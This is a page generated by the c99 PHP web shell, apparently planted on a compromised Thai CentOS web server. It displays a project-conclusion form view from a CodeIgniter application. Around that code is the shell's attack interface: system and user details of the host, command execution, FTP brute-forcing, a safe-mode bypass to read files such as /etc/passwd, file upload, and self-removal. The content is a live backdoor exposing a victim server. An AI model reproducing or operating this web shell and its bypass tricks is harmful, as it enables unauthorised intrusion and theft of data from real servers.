!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/esa/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_detail_conclude_dpj.php (14.01 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if(is_object($qu_mpj))
    
$mpj = ($qu_mpj->row()) ? $qu_mpj->row() : '';
$dpj = ($qu_dpj->row()) ? $qu_dpj->row() : '';
$stp = ($qu_stp->row()) ? $qu_stp->row() : NULL;

?>
<table border='0' width="80%">
    <tr><td></td></tr>
    <tr>
        <td align="center"><h3>บันทึกผลการดำเนินโครงการ/กิจกรรม</h3></td>
    </tr>
    <tr><td>
<?php 
    $year 
= (isset($dpj->dpj_bgY))?$dpj->dpj_bgY:$mpj_year;
?>

            <table class='szone2' width="85%" border="0" align="left">

                <tr>
                    <th width="20%" align="right">ปีงบประมาณ </th>
                    <td width="30%">
                    <?php echo set_value('mpj_year',$year); ?>
                    </td>
                    <td width="50%" align="left"><b><?php
                    
echo ($qu_dpj->num_rows() > 0)?($dpj->dpj_mpj_id==0)?'รหัสโครงการ':'รหัสกิจกรรม' :'รหัสโครงการ';

                    
?></b>&nbsp;&nbsp;<?php echo (($dpj->dpj_code)?$dpj->dpj_code:'');?></td>
                </tr>
                <tr>
                    <th  align="right">ชื่อโครงการ </th>
                    <td colspan="2">
<?php
                
//if($dpj!=''){
                
if(is_object($dpj)){
                    
//if($qu_mpj!=''){ //หน้าจอกิจกรรม
                    
if(is_object($qu_mpj)){ //หน้าจอกิจกรรม
                        
echo isset($mpj->dpj_sub_name)?$mpj->dpj_sub_name:'';
                    }else{ 
//หน้าจอโครงการ
                        
echo $dpj->dpj_sub_name;
                    }
                }
?>
                    </td>
                </tr>
<?php
                
if($dpj->dpj_mpj_id != 0){

?>                <tr>
                    <th  align="right">ชื่อกิจกรรม </th>
                    <td colspan="2">
<?php
                        
echo $dpj->dpj_sub_name
?>
                    </td>
                </tr>
<?php
                   
}
?>
                <tr>
                    <th  align="right">เจ้าของโครงการ (หลัก) </th>
                    <td colspan="2"><?php echo (($dpj->dpj_owner)?$dpj->sc_name:'-');?></td>
                </tr>
                <tr valign='top'>
                    <th  align="right">เจ้าของโครงการ (ร่วม)</th>
                    <td colspan="2">
                        <table>
<?php
                                $index 
1;
                                if (
$rs_co->num_rows()>0) {
                                    foreach (
$rs_co->result() as $row_co) {
?>
                                <tr><td>
                                    <?php echo "<li>".$row_co->sc_name."</li>";?>
                                </td></tr>
<?php
                                        $index
++;
                                    }
                                } else {
?>
                                <tr><td>-</td></tr>
<?php
                                
}
?>
                        </table>
                    </td>
                </tr>
                <tr>
                    <th align="right">ผู้ดำเนินโครงการ</th>
                    <td colspan="2"><?php echo $dpj->dpj_manager?></td>
                </tr>
                <tr>
                    <th align="right">ที่ปรึกษาโครงการ</th>
                    <td colspan="2"><?php echo $dpj->dpj_adviser?></td>
                </tr>
                <tr>
                    <th valign="top" align="right">วัตถุประสงค์</th>
                    <td colspan="2"><?php echo $dpj->dpj_objective?></td>
                </tr>
                <tr valign="top">
                    <th align="right">ผลผลิต/ผลลัพธ์</th>
                    <td colspan="2"><?php echo $dpj->dpj_result?></td>
                </tr>
                <tr>
                    <th valign="top" align="right">คุณลักษณะโครงการ </th>
                    <td valign="top" colspan="2">
<?php 
if ($dpj->dpj_attribute==1) {
?>
    <table border='0'>

<?php 
// atb
if ($qu_atb->num_rows 0) {
    
$index=1;
    
$p 1;
    
$p_index=0;
    foreach (
$qu_atb->result() as $row) {

        if(
$row->p_atb_id != $p_index){
            
$p_index $row->p_atb_id ;
?>
    <tr >

        <td align="left">&nbsp;<?php  if($row->p_atb_parentId!=0){echo nbs(2); }else{ echo ''; } ?>&nbsp;<font size="2">
        <?php echo form_checkbox("atb_id".$index$row->p_atb_idset_value("atb_id".$index,$row->tp_atb_id),'disabled').nbs(1).$row->p_atb_name;?></td>

    </tr>

<?
        
if($row->atb_id !=NULL){
            
$index++;
?>
    <tr class='szone2'>

        <td align="left">&nbsp;<?php  if($row->atb_parentId!=0){echo nbs(2); }else{ echo ''; } ?>&nbsp;<font size="2">
        <?php echo form_checkbox("atb_id".$index$row->atb_idset_value("atb_id".$index,$row->tp_atb_id),'disabled').nbs(1).$row->atb_name;?></td>
    </tr>
<?
            
}
        }else{
        
?>
        
    <tr class='szone2'>

        <td align="left">&nbsp;<?php  if($row->atb_parentId!=0){echo nbs(2); }else{ echo ''; } ?>&nbsp;<font size="2">
        <?php echo form_checkbox("atb_id".$index$row->atb_idset_value("atb_id".$index,$row->tp_atb_id),'disabled').nbs(1).$row->atb_name;?></td>

    </tr><!-- img($_image_del,array('onClick'=>"do_delete($row->atb_id,1);")); -->
<?php 
        
}
        
$index++;
    }
} else {
?>
    <tr>
        <td colspan="3" height="22" align="center" bgcolor="#D1DCF3">ไม่พบคุณลักษณะโครงการ</td>
    </tr>
<?php 
}
// end atb
?>
                        </table>
<?} else if ($dpj->dpj_attribute==2) {

?>
    <table border='0'>
    <tr   valign="top">
        <td align="right" >กลยุทธ์ </td>
        <td align="left" ></td>
    </tr>
    <tr   valign="top">
        <td align="right" >ประเด็นยุทธศาสตร์ </td>
        <td align="left" ><?php echo getval('stp_stg_id',$stp); ?></td>
    </tr>
        <tr  valign="top">
            <td align="right">กลยุทธ์</td>
            <td colspan="2"><?php echo getval('stp_strategy',$stp)?></td>
        </tr>
        <tr  valign="top">
            <td align="right">เป้าประสงค์</td>
            <td colspan="2"><?php echo getval('stp_goal',$stp);?></td>
        </tr>
    </table>
<?php 
?>
                <tr valign="top">
                    <th align="right">บูรณาการกับฝ่ายอื่นๆ</th>
                    <td colspan="2">
                    <table border='0' width="80%">
                        <?php 
                        
// atb
                        
if ($qu_itg->num_rows 0) {
                            
$index=1;
                            
$p 1;
                            
$p_index=0;
                        
?>
                        <?php
                            
foreach ($qu_itg->result() as $row) {
                                if(
$row->p_itg_id != $p_index){
                                    
$p_index $row->p_itg_id ;
                        
?>
                            <tr class='szone2'>

                                <td align="left">&nbsp;<?php  if($row->p_itg_parentId!=0){echo nbs(2); }else{ echo ''; } ?>&nbsp;<font size="2">
                                <?php echo form_checkbox("itg_id".$index$row->p_itg_idset_value("itg_id".$index,$row->igp_itg_id)).nbs(1).$row->p_itg_name;?></td>

                            </tr>

                        <?
                            
if($row->itg_id !=NULL){
                                
$index++;
                        
?>
                            <tr class='szone2'>

                                <td align="left">&nbsp;<?php  if($row->itg_parentId!=0){echo nbs(2); }else{ echo ''; } ?>&nbsp;<font size="2">
                                <?php echo form_checkbox("itg_id".$index$row->itg_idset_value("itg_id".$index,$row->igp_itg_id)).nbs(1).$row->itg_name;?></td>
                            </tr>
                        <?
                                    
}
                                }else{
                                
                        
?>
                                
                            <tr class='szone2'>

                                <td align="left">&nbsp;<?php  if($row->itg_parentId!=0){echo nbs(2); }else{ echo ''; } ?>&nbsp;<font size="2">
                                <?php echo form_checkbox("itg_id".$index$row->itg_idset_value("itg_id".$index,$row->igp_itg_id)).nbs(1).$row->itg_name;?></td>

                            </tr>
                        <?php 
                                
}
                                
$index++;
                            }
                        } else {
                        
?>
                            <tr>
                                <td colspan="3">ไม่พบบูรณาการ</td>
                            </tr>
                        <?php 
                        
}
                        
// end atb
                        
?>
                        </table>
                    </td>
                </tr>
                <tr valign="top">
                    <th>บูรณาการกับรายวิชา </th>
                    <td colspan="2">
                    <?
                    
if($rs_igc->num_rows() > 0) {
                        foreach (
$rs_igc->result() as $crs_row) {
                            echo 
"<li>".$crs_row->crsCode." ".explodeSquare($crs_row->crsName)." &nbsp;</li>";
                        }
                    }
                    
?>
                    </td>
                </tr>
                <tr valign="top">
                    <th>ตัวชี้วัด</th>
                    <td colspan="2">
                    <?php echo $dpj->dpj_indicator?>
                    </td>
                </tr>
                <tr valign="top">
                    <th>เป้าหมาย</th>
                    <td colspan="2"><?php echo $dpj->dpj_target?>
                    </td>
                </tr>
                <tr>
                    <th>สถานที่ดำเนินการ </th>
                    <td colspan="2"><?php echo $dpj->dpj_place?></td>
                </tr>
                <tr>
                    <th>ระยะเวลาในการดำเนินงาน</th>
                    <td  colspan="2"> 
                    <table border='0'>
                        <tr>
                            <td >วันที่เริ่มต้น </td><td ><?php echo fulldate2($dpj->dpj_fr_date);?></td>
                            <td >วันที่สิ้นสุด </td><td ><?php echo fulldate2($dpj->dpj_to_date);?></td>
                        </tr>
                    </table>
                    </td>
                </tr>
                <tr>
                    <th>วิธีดำเนินการ </th>
                    <td colspan="2"><?php echo $dpj->dpj_procedure?></td>
                </tr>
                <tr>
                    <th>ผู้จัดทำโครงการ</th>
                    <td colspan="2"><?php echo $dpj->dpj_creator?></td>
                </tr>
<?php if ($dpj->dpj_mpj_id == 0) {
?>
                <tr valign='top'>
                    <th valign='top'>กิจกรรม</th>
                    <td colspan="2">
                        <table>
<?php
                        $index 
1;
                        if (
$rs_acp->num_rows()>0) {
                            foreach (
$rs_acp->result() as $row_acp) {
?>
                            <tr><td>
                            กิจกรรมที่ <?php echo $index.' '.$row_acp->dpj_sub_name?>
                            </td></tr>
<?php
                                $index
++;
                            }
                        }
?>
                    </table>
                    </td>
                </tr>
<?php }
?>
                <tr valign='top'>
                    <th align="right" valign='top'>แผนงบประมาณโครงการ</th>
                    <td colspan="2"></td>
                </tr>
<?php 
if ($qu_sb->num_rows 0) {
    
$index=1;
    
$p 1;
    
$p_index=0;
    foreach (
$qu_sb->result() as $row) {

        if(
$row->p_sb_id != $p_index){
            
$p_index $row->p_sb_id ;
?>
    <tr>
        <th></th>
        <td align="left" >&nbsp;<?php  if($row->p_sb_pid!=0){echo nbs(2); }else{ echo ''; } ?>&nbsp;<font size="2"><?php echo '<b>'.$row->p_sb_name.'<b>';?></b></font></td>
        <td width="60%"><?php echo ($row->p_cost)? $row->p_cost.'&nbsp;บาท''-'?></td>
    </tr>

<?
            
if($row->sb_id !=NULL){
                
$index++;
?>
    <tr>
        <th></th>
        <td align="left">&nbsp;<?php  if($row->sb_pid!=0){echo nbs(2); }else{ echo ''; } ?>&nbsp;<font size="2"><?php echo $row->sb_name;?></b></font></td>
        <td><?php echo ($row->pb_cost)? $row->pb_cost.'&nbsp;บาท''-'?></td>
    </tr>
<?
            
}
        }else{
        
?>
        
    <tr>
        <th></th>
        <td align="left">&nbsp;<?php  if($row->sb_pid!=0){echo nbs(2); }else{ echo ''; } ?>&nbsp;<font size="2"><?php echo $row->sb_name;?></b></font></td>
                <td><?php echo ($row->pb_cost)? $row->pb_cost.'&nbsp;บาท''-'?></td>
    </tr>
<?php 
        
}
        
$index++;
    }
} else {
?>
    <tr class="notfound">
        <td colspan="3" height="22" align="center" bgcolor="#D1DCF3">ไม่พบแหล่งเงินงบประมาณ</td>
    </tr>

<?php 
}
?>
                <tr valign='top'>
                    <th align="right" width="10%"  valign='top'>กลุ่มเป้าหมาย</th>
                    <td colspan="2">
                        <table>
<?php
                        
if ($rs_tg->num_rows()>0) {
                            foreach (
$rs_tg->result() as $row_tg) {
                                if (
$row_tg->tg_type==5){
?>
                                    <tr><td>
                                        <?php echo $row_tg->sc_name.' '.$row_tg->tg_num.' คน'?>
                                    </td></tr>
<?php
                                
} else if ($row_tg->tg_type==1) {
?>
                                    <tr><td>
                                        <?php echo 'หลักสูตร '.$row_tg->curName.' ชั้นปี '.$row_tg->tg_tm_id.' '.$row_tg->tg_num.' คน'?>
                                    </td></tr>
<?php
                                
} else if ($row_tg->tg_type==2) {
?>
                                    <tr><td>
                                        <?php echo 'อาจารย์ '.$row_tg->tg_num.' คน'?>
                                    </td></tr>
<?php
                                
} else if ($row_tg->tg_type==3) {
?>
                                    <tr><td>
                                        <?php echo 'เจ้าหน้าที่ '.$row_tg->tg_num.' คน'?>
                                    </td></tr>
<?php
                                
} else if ($row_tg->tg_type==4) {
?>
                                    <tr><td>
                                        <?php echo 'อื่นๆ '.$row_tg->tg_num.' คน'?>
                                    </td></tr>
<?php
                                
}
                            }
                        }
?>
                    </table>
                    </td>
                </tr>
<?php echo form_open($this->config->item('sa_folder')."project/add_conclude_dpj");?>
                <tr valign="top">
                    <th>ผลการดำเนินการ</th>
                    <td colspan="2">
                        <input type="hidden" name="dpj_id" value='<?php echo $dpj->dpj_id;?>'>
                        <textarea name="dpj_conclude" id="dpj_conclude" rows="10" cols="60"><?php echo set_value('dpj_conclude',$dpj->dpj_conclude)?></textarea>
                    </td>
                </tr>
                <tr valign="top">
                    <td colspan="3" align='center'>
                        <input name="submit" type="submit" value="บันทึก">
                    </td>
                </tr>
<?php echo form_close();?>
        </table>
</td></tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0146 ]--